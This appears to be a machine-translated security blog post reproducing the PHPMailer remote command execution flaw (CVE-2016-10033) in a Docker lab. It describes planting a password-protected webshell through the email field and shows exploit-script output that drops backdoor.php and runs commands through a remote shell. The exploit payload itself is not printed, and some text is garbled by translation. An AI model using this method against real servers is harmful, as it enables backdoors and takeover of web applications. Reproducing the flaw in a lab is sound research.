PHPMailer remote command execution vulnerability reappears

PHPMailer remote command execution vulnerability reappears

I. Introduction of vulnerabilities

PHPMailer is a PHP email creation and delivery class for multiple open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! And so on.

PHPMailer < 5.2.18 has a security vulnerability that allows an unauthenticated remote attacker to execute arbitrary code in the context of a Web server user to remotely control a target Web application.

Ii. Impact Version:

PHPMailer < 5.2.18

Third, vulnerability recurrence

Docker environment:

dockerrun –rm -it -p8080:80vulnerables/cve-2016-10033

Pull image boot environment:

http://192.168.1.107:8080/

http://192.168.1.107:8080/, simply type in the name place such as “aaa”, in the email input:

Upload a word Trojan, the page will respond 3-5 minutes, the response time is long

Trojan address: http://192.168.1.107:8080/a.php password: thelostworld

Virtual terminal:

Using scripts:

Obtaining scripts The background replies to PHPMailer to obtain scripts

➜ Desktop. / exploits. Sh192.168.1.107:8080 [+] exploitbyopsxcq CVE – 2016-10033 [+] Exploiting192.168.1.107:8080 [+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php [+] Checkingifthe backdoor was createdontarget system [+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)

Access Trojan address:

http://192.168.1.107:8080/backdoor.php

Reference:

www.cnblogs.com/Hi-blog/p/7…

www.exploit-db.com/exploits/40…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you ！！！！

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq_37602797…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…

Welcome to add the author of this public account to communicate on wechat. Please note the “public account” when adding.